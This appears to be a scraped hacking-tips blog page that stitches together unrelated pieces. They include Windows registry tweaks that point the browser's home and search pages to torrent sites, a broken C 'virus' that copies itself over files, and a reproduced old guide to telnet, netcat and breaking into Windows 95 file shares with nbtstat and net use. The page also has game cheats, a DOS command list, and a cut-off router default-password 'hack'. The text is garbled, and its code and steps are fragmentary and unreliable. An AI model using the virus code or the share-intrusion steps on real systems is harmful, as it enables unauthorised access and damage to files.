"Settings"=hex:09,00,00,00,03,00,00,00,00,00,00,00,e0,a5,1f,0e,73,35,cf,11,ae,\
69,08,00,2b,2e,12,62,04,00,00,00,04,00,00,00,43,00,00,00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams]
"Settings"=hex:09,00,00,00,01,00,00,00,01,00,00,00,e0,d0,57,00,73,35,cf,11,ae,\
69,08,00,2b,2e,12,62,04,00,00,00,04,00,00,00,43,00,00,00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams]
"Settings"=hex:08,00,00,00,04,00,00,00,01,00,00,00,00,77,7e,13,73,35,cf,11,ae,\
69,08,00,2b,2e,12,62,04,00,00,00,10,00,00,00,43,00,00,00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"StartMenuLogoff"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"StartMenuLogoff"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"StartMenuLogoff"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"StartMenuLogoff"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"ForceStartMenuLogoff"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"ForceStartMenuLogoff"=dword:00000001
"ClassicViewState"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000002
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"WebViewBarricade"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"DisableThumbnailCache"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ClassicViewState"=dword:00000000
"PersistBrowsers"=dword:00000000
"ServerAdminUI"=dword:00000000
"EnableBalloonTips"=dword:00000001
"Start_ShowNetPlaces_ShouldShow"=dword:00000041
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_MinMFU"=dword:00000004
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_ShowControlPanel"=dword:00000002
"Start_ShowHelp"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_ShowMyDocs"=dword:00000002
"Start_ShowMyMusic"=dword:00000000
"Start_ShowMyPics"=dword:00000000
"Start_ShowPrinters"=dword:00000000
"Start_ShowSetProgramAccessAndDefaults"=dword:00000000
"Start_ShowRecentDocs"=dword:00000002
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_NotifyNewApps"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_AdminToolsRoot"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_LargeMFUIcons"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarGlomming"=dword:00000000
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
\Advanced]
"TaskbarGlomming"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\MyComputer\NameSpace\{2227A280-3AEA-1069-A2DE-08002B30309D}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\MyComputer\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\MyComputer\NameSpace\{7007ACC7-3202-11D1-AAD2-00805FC1270E}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\MyComputer\NameSpace\{D20EA4E1-3957-11D2-A40B-0C5020524153}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\MyComputer\NameSpace\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\HideMyComputerIcons]
"{21EC2020-3AEA-1069-A2DD-08002B30309D}"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum]
"{645FF040-5081-101B-9F08-00AA002F954E}"=dword:00000001
;Preset Folder Customizations for dialog box Sets default to My Computer then lists My
Computer, C:, D:, E:, and Network Places on side C: here is represented as %
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\comdlg32
\PlacesBar]
"Place0"=dword:00000011
"Place1"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,44,00,72,00,69,00,76,\
00,65,00,25,00,5c,00,00,00
"Place2"="D:\\"
"Place3"="E:\\"
"Place4"=dword:00000012
@=dword:00000011
[HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}]
"SortOrderIndex"=dword:00000048
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"NoFileFolderConnection"=dword:00000001
;Launch Windows Desktop in a Separate Process (i.e., de-link IE from windows explorer
"DesktopProcess"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\VisualEffects\WebView]
"DefaultValue"=dword:00000000
[HKEY_CURRENT_USER\Control Panel\Desktop]
"ForegroundLockTimeout"=dword:00030d40
"ForegroundFlashCount"=dword:00000003
[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000
;Change Recycle Bin Icons The icons must be in the $$ folder directly for unattend
install.If you use this after an install then the Bmp file must be under windows folder
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID
\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon]
@="%WinDir%\\system32\\shell32.dll,31"
"Full"="%WinDir%\\system32\\shell32.dll,32"
"Empty"="%WinDir%\\system32\\shell32.dll,31"
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
\MenuOrder]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoStartMenuMFUprogramsList"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
[HKEY_CURRENT_USER\Control Panel\Desktop]
"MenuShowDelay"="200"
[-HKEY_CLASSES_ROOT\CLSID\{540D8A8B-1C3F-4E32-8132-530F6A502090}]
@=-
"MenuTextPUI"=-
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSimpleStartMenu"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"EnableAutoTray"=dword:00000000
showtopic=51753
;=======================================================================
; 7 - Logon
;=======================================================================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\UnreadMail]
"MessageExpiryDays"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"EnableQuickReboot"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"PowerdownAfterShutdown"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"dontdisplaylastusername"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"legalnoticecaption"=""
"legalnoticetext"=""
;=======================================================================
; Visual Settings
;=======================================================================
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes
\DownloadSites]
;Disable screensavers
[HKEY_CURRENT_USER\Control Panel\Desktop]
"ScreenSaveActive"="0"
[HKEY_CURRENT_USER\Control Panel\Desktop]
"SCRNSAVE.EXE"=""
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaveActive"="0"
[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"SCRNSAVE.EXE"=""
[HKEY_CURRENT_USER\Control Panel\Desktop]
"FontSmoothingType"=dword:00000002
;=======================================================================
;=======================================================================
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-
08002B30309D}\shell\Panneau de configuration\command]
@="rundll32.exe shell32.dll,Control_RunDLL"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Ajout &
Supression de programmes\command]
@="control appwiz.cpl"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\regedit]
@="Regedit"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\regedit
\command]
@="Regedit.exe"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\msconfig]
@="Msconfig"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\msconfig
\command]
@="msconfig.exe"
;=======================================================================
; Context Menus
;=======================================================================
;Makes a right click option for unknown files (Open with notepad)
[HKEY_CLASSES_ROOT\*\shell]
@="\"notepad.exe %1\""
[HKEY_CLASSES_ROOT\*\shell\open]
[HKEY_CLASSES_ROOT\*\shell\open\command]
@="notepad.exe %1"
@="Invite de commande"
@="cmd.exe /k cd %1"
; disable file association web-service - Bypassing "Browse web for program" to open
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"NoInternetOpenWith"=dword:00000001
[HKEY_CLASSES_ROOT\*\shell\open]
[HKEY_CLASSES_ROOT\*\shell\open\command]
@="notepad.exe %1"
;This adds an option in the right-click (context) menu to open any folder on your
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\openNew]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\openNew\Command]
@="explorer %1"
;=======================================================================
;=======================================================================
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup]
"header"=""
"footer"=""
[HKEY_Current_User\Software\Microsoft\Office\10.0\Outlook\Preferences]
"MinToTray"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
[HKEY_CURRENT_USER\Identities\{E2883460-019D-11D8-AC1F-AA7C5EECB833}\Software
\Microsoft\Outlook Express\5.0]
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.bwa-qc.com/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Search Page"="http://torrentsearcher.filesharingplace.com/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchURL]
@="http://www.google.com/keyword/%s"
"provider"="gogl"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://torrentsearcher.filesharingplace.com/ie/"
;Adds search keywords to Internet Explorer address bar (in this order: Microsoft
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\MSKB]
@="http://support.microsoft.com/?kbid=%s"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\AV]
@="http://www.microhard.co.nr"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\g]
@="http://www.google.com/search?q=%s"
Virus code in c
/*this is a simple program to create a virus in c
it will create folder in a folder in a folder and so on run this on your own
responsibility*/
#include
#include
#include
#include
#include
{ char buf[512];
int source,target,byt,done;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
close(source);
close(target);
done = findnext(&ffblk);
getch();
Labels: administrator, cracks, dos, mail hacking, password, password hacking, pc hacking, registry, remote
2)Now rename the folder with a space(U have to hold ALT key and type 0160).
5)Scroll a bit, u should find some empty spaces, Click on any one of them.click ok
Thats it,now u can store ur personal data without any 3rd party tools
DOS HACKING
****************************************************** In this Guide you will learn how to: * Use
telnet from Windows * Download web pages via telnet * Get finger information via
telnet * Telnet from the DOS command-line * Use netcat * Break into Windows
Computers from the Internet Protecting Yourself What can they do The command-line
Computer Telnet is great little program for doing a couple of interesting things. In fact,
if you want to call yourself a hacker, you absolutely MUST be able to telnet! In this
lesson you will find out a few of the cool things a hacker can do with telnet. If you are
using Win95, you can find telnet in the c:\windows directory, and on NT, in the c:\winnt
\system32 directory. There isn't a lot of online help concerning the usage of the
program, so my goal is to provide some information for new users. First off, telnet isn't
so much an application as it is a protocol. Telnet is protocol that runs over TCP/IP, and
was used for connecting to remote computers. It provides a login interface, and you
can run command-line programs by typing the commands on your keyboard, and the
programs use the resources of the remote machine. The results are displayed in the
terminal window on your machine, but the memory and CPU cycles consumed by the
program are located on the remote machine. Therefore, telnet functions as a terminal
emulation program, emulating a terminal on the remote machine. Now, telnet runs on
your Win95 box as a GUI application...that is to say that you can type "telnet" at the
command prompt (in Windows 95 this is the MS-DOS prompt), and assuming that your
PATH is set correctly, a window titled "telnet" will open. This differs from your ftp
program in that all commands are entered in the DOS window. Let's begin by opening
telnet. Simply open a DOS window by clicking "start", then "programs", then "MS-DOS",
and at the command prompt, type: c:\telnet The window for telnet will open, and you
can browse the features of the program from the menu bar.
only to the telnet program that ships with Win95/NT. If you type "telnet" at the
command prompt and you don't get the telnet window, make sure that the program is
on your hard drive using the Start -> Find -> Files or Folders command. Also make sure
that your path statement includes the Windows directory. There are many other
programs available that provide similar functionality, with a lot of other bells and
To learn a bit more about telnet, choose Help -> Contents, or Help -> Search for help
on... from the menu bar. Read through the files in order to find more detailed
explanations of things you may wish to do. For example, in this explanation, I will
primarily be covering how to use the application and what it can be used for, but now
how to customize the colors for the application. Now, if you choose Connect -> Remote
System, you will be presented with a dialog window that will ask you for the remote
NEWBIE NOTE: For most purposes, you can leave the terminal type on VT100.
the host to which you wish to connect, and there is a list box of several ports you can
connect to: daytime: May give you the current time on the server. echo: May echo back
whatever you type in, and will tell you that the computer you have connected to is
alive nd running on the Internet. qotd: May provide you with a quote of the day.
chargen: May display a continuous stream of characters, useful for spotting network
problems, but may crash your telnet program. telnet: May present you with a login
screen. These will only work if the server to which you are trying to connect is running
these services. However, you are not limited to just those ports...you can type in any
port number you wish. (For more on fun ports, see the GTMHH, "Port Surf's Up.") You
will only successfully connect to the port if the service in question is available. What
occurs after you connect depends upon the protocol for that particular service. When
you are using telnet to connect to the telnet service on a server, you will (in most
cases) be presented with a banner and a login prompt. [Note from Carolyn Meinel:
Many people have written saying their telnet program fails to connect no matter what
host they try to reach. Here's a way to fix your problem. First -- make sure you are
already connected to the Internet. If your telnet program still cannot connect to
anything, here's how to fix your problem. Click "start" then "settings" then "control
panel." Then click "Internet" then "connection." This screen will have two boxes that
may or may not be checked. The top one says "connect to the Internet as needed." If
that box is checked, uncheck it -- but only uncheck it if you already have been having
problems connecting. The bottom box says "connect through a proxy server." If that
box is checked, you probably are on a local area network and your systems
NEWBIE NOTE: It's not a good idea to connect to a host on which you don't have a valid
account. In your attempts to guess a username and password, all you will do is fill the
log files on that host. From there, you can very easily be traced, and your online
ports, such as ftp (21), smtp (25), pop3 (110), and even http (80). When you connect to
ftp, smtp, and pop3, you will be presented with a banner, or a line of text that
displays some information about the service. This will give you a clue as to the
operating system running on the host computer, or it may come right out and tell you
what the operating system is...for instance, AIX, Linux, Solaris, or NT. If you
successfully connect to port 80, you will see a blank screen. This indicates, again, that
you have successfully completed the TCP negotiation and you have a connection. Now,
what you do from there is up to you. You can simply disconnect with the knowledge
that, yes, there is a service running on port 80, or you can use your knowledge of the
HTTP protocol to retrieve the HTML source for web pages on the server. How to
Download Web Pages Via Telnet To retrieve a web page for a server using telnet, you
need to connect to that server on port 80, generally. Some servers may use a different
port number, such as 8080, but most web servers run on port 80. The first thing you
need to do is click on Terminal -> Preferences and make sure that there is a check in
the Local Echo box. Then, since most web pages will generally take up more than a
single screen, enable logging by clicking Terminal -> Start Logging... and select a
location and filename. Keep in mind that as long as logging is on, and the same file is
being logged to, all new information will be appended to the file, rather than
overwriting the original file. This is useful if you want to record several sessions, and
edit out the extraneous information using Notepad. Now, connect the remote host, and
if your connection is successful, type in: GET / HTTP/1.0 and hit enter twice.
twice...this is part of the HTTP protocol. The single / after GET tells the server to
return the default index file, which is generally "index.html". However, you can enter
a bunch of text scroll by on the screen. Now you can open the log file in Notepad, and
you will see the HTML code for the page, just as though you had chosen the View
Source option from your web browser. You will also get some additional information...
the headers for the file will contain some information about the server. For example:
HTTP/1.0 200 Document follows Date: Thu, 04 Jun 1998 14:46:46 GMT Server:
name. This refers to the web server software that is running and serving web pages.
You may see other names in this field, such as versions of Microsoft IIS, Purveyor,
WebSite, etc. This will give you a clue as to the underlying operating system running on
annoying. Make sure you keep up on exploits and the appropriate security patches from
web pages is perfectly legal. You aren't attempting to compromise the target system,
you are simply doing by hand what your web browser does for you automatically. Of
course, this technique will not load images and Java applets for you.
you've probably heard or read a lot about finger. It doesn't seem like a very useful
service, and many sysadmins disable the service because it provides information on a
particular user, information an evil hacker can take advantage of. Win95 doesn't ship
with a finger client, but NT does. You can download finger clients for Win95 from any
number of software sites. But why do that when you have a readily available client in
telnet? The finger daemon or server runs on port 79, so connect to a remote host on
that port. If the service is running, you will be presented with a blank screen.
daemon (A daemon is a program on the remote computer which waits for people like
you to connect to it), so generally speaking, and server that you find running finger will
be a Unix box. I say "generally" because there are third-party finger daemons available
daemon is waiting for input. If you have a particular user that you are interested in,
type in the username and hit enter. A response will be provided, and the daemon will
disconnect the client. If you don't know a particular username, you can start by simply
hitting enter. In some cases, you may get a response such as "No one logged on." Or you
may get information of all currently logged on users. It all depends on whether or not
the sysadmin has chosen to enable certain features of the daemon. You can also try
other names, such as "root", "daemon", "ftp", "bin", etc. Another neat trick to try out is
something that I have seen referred to as "finger forwarding". To try this out, you need
two hosts that run finger. Connect to the first host, host1.com, and enter the
username that you are interested in. Then go to the second host, and enter:
user@host1.com You should see the same information! Again, this all depends upon the
configuration of the finger daemon. Using Telnet from the Command Line Now, if you
want to show your friends that you a "real man" because "real men don't need no
stinkin' GUIs", well just open up a DOS window and type: c:\>telnet and the program
will automatically attempt to connect to the host on the designated port for you. Using
Netcat Let me start by giving a mighty big thanks to Weld Pond from L0pht for
producing the netcat program for Windows NT. To get a copy of this program, which
comes with source code, simply go to: http://www.l0pht.com/~weld NOTE: The first
character of "l0pht: is the letter "l". The second character is a zero, not an "o". I know
that the program is supposed to run on NT, but I have seen it run on Win95. It's a great
little program that can be used to do some of the same things as telnet. However,
there are advantages to using netcat...for one, it's a command-line program, and it can
be included in a batch file. In fact, you can automate multiple calls to netcat in a
NEWBIE NOTE: For more information on batch files, see previous versions of the Guide
To (mostly) Harmless Hacking, Getting Serious with Windows series ...one of them
Before using netcat, take a look at the readme.txt file provided in the zipped archive
you downloaded. It goes over the instructions on how to download web pages using
getting finger information using netcat. The first is in interactive mode. Simply type: c:
\>nc 79 If the daemon is running, you won't get a command prompt back. If this is the
case, type in the username and hit enter. Or use the automatic mode by first creating
a text file containing the username of interest. For example, I typed: c:\>edit root and
entered the username "root", without the quotes. Then from the command prompt,
type: c:\>nc 79 <>nc 79 <> nc.log to create the file nc.log, or: c:\>nc 79 <>> nc.log to
append the response to the end of nc.log. NOTE: Make sure that you use spaces
How to Break into a Windows 95 machine Connected to the Internet Disclaimer The
intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer
while it is connected to the Internet. The intent is show you how to protect yourself.
There are no special tools needed to access a remote Win95 machine...everything you
need is right there on your Win95 system! Two methods will be described...the
command-line approach and the GUI approach. Protecting Yourself First, the method of
protecting yourself needs to be made perfectly clear. DON'T SHARE FILES!! I can't stress
that enough. If you are a home user, and you are connecting a Win95 computer to the
Internet via some dial-up method, disable sharing. If you must share, use a strong
password...8 characters minimum, a mix of upper and lower case letters and numbers,
change the password every now and again. If you need to transmit the password to
Computer -> Control Panel -> Network -> File and Print Sharing. In the dialog box that
appears, uncheck both boxes. It's that easy. What Can They Do? What can someone do?
Well, lots of stuff, but it largely depends on what shares are available. If someone is
able to share a printer from your machine, they can send you annoying letters and
messages. This consumes time, your printer ink/toner, and your paper. If they are able
share appears as another directory on the attacker's machine, so any programs they run
will be consuming their own resources...memory, cpu cycles, etc. But if the attacker
has read and write access to those disk shares, then you're in trouble. If you take work
home, your files may be vulnerable. Initialization and configuration files can be
searched for passwords. Files can be modified and deleted. A particularly nasty thing
to do is adding a line to your autoexec.bat file so that the next time your computer is
booted, the hard drive is formatted without any prompting from the user. Bad ju-ju,
indeed. ** The command-line approach ** Okay, now for the part that should probably
be titled "How they do it". All that is needed is the IP address of the remote machine.
Now open up a DOS window, and at the command prompt, type: c:\>nbtstat -A
[ip_addr] If the remote machine is connected to the Internet and the ports used for
sharing are not blocked, you should see something like: NetBIOS Remote Machine Name
Registered DOMAIN <00> GROUP Registered NAME <03> UNIQUE Registered USERNAME
<03> UNIQUE Registered MAC Address = 00-00-00-00-00-00 This machine name table
shows the machine and domain names, a logged-on username, and the address of the
Ethernet adapter (the information has been obfuscated for instructional purposes).
**Note: This machine, if unpatched and not protected with a firewall or packet-filter
fairly popular, largely because they require no skill or knowledge to perpetrate. The
key piece of information that you are looking for is in the Type column. A machine that
has sharing enabled will have a hex code of "<20>". **Note: With the right tools, it is
fairly simple for a sysadmin to write a batch file that combs a subnet or her entire
network, looking for client machines with sharing enabled. This batch file can then be
run at specific times...every day at 2:00 am, only on Friday evenings or weekends, etc.
If you find a machine with sharing enabled, the next thing to do is type the following
command: c:\>net view \\[ip_addr] Now, your response may be varied. You may find
that there are no shares on the list, or that there are several shares available. Choose
which share you would like to connect to, and type the command: c:\>net use g: \
\[ip_addr]\[share_name] You will likely get a response that the command was
completed successfully. If that is the case, type: c:\>cd g: or which ever device name
you decided to use. You can now view what exists on that share using the dir
commands, etc. Now, you may be presented with a password prompt when you ssue
the above command. If that is the case, typical "hacker" (I shudder at that term)
methods may be used. ** The GUI approach ** After issuing the nbtstat command, you
can opt for the GUI approach to accessing the shares on that machine. To do so, make
sure that you leave the DOS window open, or minimized...don't close it. Now, use
Notepad to open this file: c:\windows\lmhosts.sam Read over the file, and then open
create another file in Notepad, called simply "Lmhosts", without an extension. The file
should contain the IP address of the host, the NetBIOS name of the host (from the
nbtstat command), and #PRE, separated by tabs. Once you have added this
information, save it, and minimize the window. In the DOS command window, type: c:
\>nbtstat -R This command reloads the cache from the Lmhosts file you just created.
Now, click on Start -> Find -> Computer, and type in the NetBIOS name of the
computer...the same one you added to the lmhosts file. If your attempt to connect to
the machine is successful, you should be presented with a window containing the
available shares. You may be presented with a password prompt window, but again,
typical "hacker" (again, that term grates on me like fingernails on a chalk board, but
today, it seems that it's all folks understand) techniques may be used to break the
try this stuff without winding up in jail or getting expelled from school? Get a friend to
give you permission to try to break in. First, you will need his or her IP address. Usually
this will be different every time your friend logs on. You friend can learn his or her IP
address by going to the DOS prompt while online and giving the command "netstat -r".
Something like this should show up: C:\WINDOWS>netstat -r Route Table Active Routes:
should be under "Gateway Address." Ignore the 127.0.0.1 as this will show up for
everyone and simply means "locahost" or "my own computer." If in doubt, break the
Internet connection and then get online again. The number that changes is the IP
scary. In your shell account give the "netstat" command. If your ISP allows you to use
it, you might be able to get the dynamically assigned IP addresses of people from all
over the world -- everyone who is browsing a Web site hosted by your ISP, everyone
using ftp, spammers you might catch red-handed in the act of forging email on your
ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see
Windows 95 box on the Internet with file sharing enabled and no password protection,
you can still get in big trouble for exploiting it. It's just like finding a house whose
owner forgot to lock the door -- you still are in trouble if someone catches you inside.
Please remember that this Guide is for instructional purposes only and is meant to
educate the sysadmin and user alike. If someone uses this information to gain access to
a system which they have no permission or business messing with, I (keydet) cannot be
responsible for the outcome. If you are intending to try this information out, do so with
the consent and permission of a friend. If there are questions, comments or any doubts
Labels: cracking, dos, hacking, hacks, mail hacking, telnet, web hacking, windows, windows xp
type xyzzy. Next hold down either shift key for one second. Now when you move the
mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left
corner of your desktop screen. This pixel will change to black when your mouse moves
over a mine. You may need to change you desktop background to a solid color other
Pinball
Secret - Extra BallsInstructions - Type 1max at the start of a new ball to get extra balls.
Secret - Gravity WellInstructions - Type gmax at the start of a new game to activate
in ranks.
Secret - Skill ShotInstructions - Launch the ball partially up the chute past the third
yellow light bar so it falls back down to get 75,000 points. There are six yellow light
Secret - Test ModeInstructions - Type hidden test at the start of a new ball to activate
Test Mode. No notification will be given that this is activated but you can now left-
notification will be given that this is activated but when a ball is lost a new ball will
appear from the yellow wormhole indefinitely. Once this is activated you will be
FreeCell
Secret - Instant WinInstructions - Hold down Ctrl + Shift + F10 during game play. Then
you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any
Secret - Hidden Game ModesInstructions - In the “Game” menu choose “Select Game”.
Solitaire
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of
Infinite Points
In the Windows XP version of solitaire, draw from the deck at least twice. Hold control
and drag a card down from the deck. Click the “A” key and then let go of the left
mouse key. You will get 10 points for this. Continue doing this for infinite points!
To do this trick, finish a game of solitaire with the time bonus option on. The cards will
start bouncing. Click on the solitaire screen and the play again box will pop up. Select
no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2)
and you will recieve the time bonus you got last game will be added to your last
game’s score. For example, if your time bonus was 5000, and your final score was
6000, after using this glitch, you will have a score of 11000. This glitch can be used as
Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand
pane, create a new String Value. Immediately rename it to “ZB” (without the quotes);
give it a value of “42″ (again, sans quotes). The next time you’re in a game of Hearts,
Labels: cheatcodes, cheats, computers, cracking, cracks, games, hacks, minesweeper, solitair
There are some hidden dos commands which u can't recognise by typing help in cmd
COMMANDS:--
ANSI.SYS
Defines functions that change display graphics, control cursor movement, and reassign
keys.
APPEND
Causes MS-DOS to look in other directories when editing a file or running a command.
ARP
ASSIGN
ASSOC
AT
ATMADM
ATTRIB
BATCH
BOOTCFG
Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK
CACLS
CALL
CD
Changes directories.
CHCP
CHDIR
Changes directories.
CHKDSK
CHKNTFS
CHOICE
CLS
CMD
COLOR
Easily change the foreground and background color of the MS-DOS window.
COMMAND
COMP
Compares files.
COMPACT
CONTROL
CONVERT
COPY
CTTY
DATE
DEBUG
DEFRAG
DEL
DELETE
DELTREE
DIR
DISABLE
DISKCOMP
DISKCOPY
Copy the contents of one disk and place them on another disk.
DOSKEY
Command to view and execute commands that have been run in the past.
DOSSHELL
DRIVPARM
ECHO
EDIT
EDLIN
EMM386
ENABLE
ENDLOCAL
Stops the localization of the environment changes enabled by the setlocal command.
ERASE
EXIT
EXPAND
EXTRACT
FASTHELP
FC
Compare files.
FDISK
FIND
FINDSTR
FIXBOOT
FIXMBR
FOR
FORMAT
FTP
FTYPE
GOTO
GRAFTABL
HELP
IF
IFSHLP.SYS
IPCONFIG
KEYB
LABEL
LH
LISTSVC
LOADFIX
LOADHIGH
LOCK
LOGON
MAP
MD
MEM
MKDIR
MODE
MORE
MOVE
MSAV
MSD
Diagnostics utility.
MSCDEX
NBTSTAT
NET
NETSH
NETSTAT
NLSFUNC
NSLOOKUP
PATH
PATHPING
PAUSE
PING
POPD
POWER
PROMPT
PUSHD
QBASIC
RD
REN
RENAME
RMDIR
ROUTE
RUNAS
SCANDISK
SCANREG
SET
SETLOCAL
SETVER
SHARE
SHIFT
SHUTDOWN
SMARTDRV
SORT
START
SUBST
SWITCHES
SYS
TELNET
TIME
TITLE
TRACERT
TREE
TYPE
UNDELETE
UNFORMAT
UNLOCK
VER
VERIFY
Enables or disables the feature to determine if files have been written properly.
VOL
XCOPY
Copy multiple files, directories, and/or drives from one location to another.
This hack is based on a secuirty exploit of the router's default password and the
router is set to manufactory defaults like IP range, user accounts, router table, and
most important the security level. The last one we will exploit.Most routers will have a
user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or
Step 1.
Get a multie IP range scanner like superscanner (superscanner is fast and easy to use,
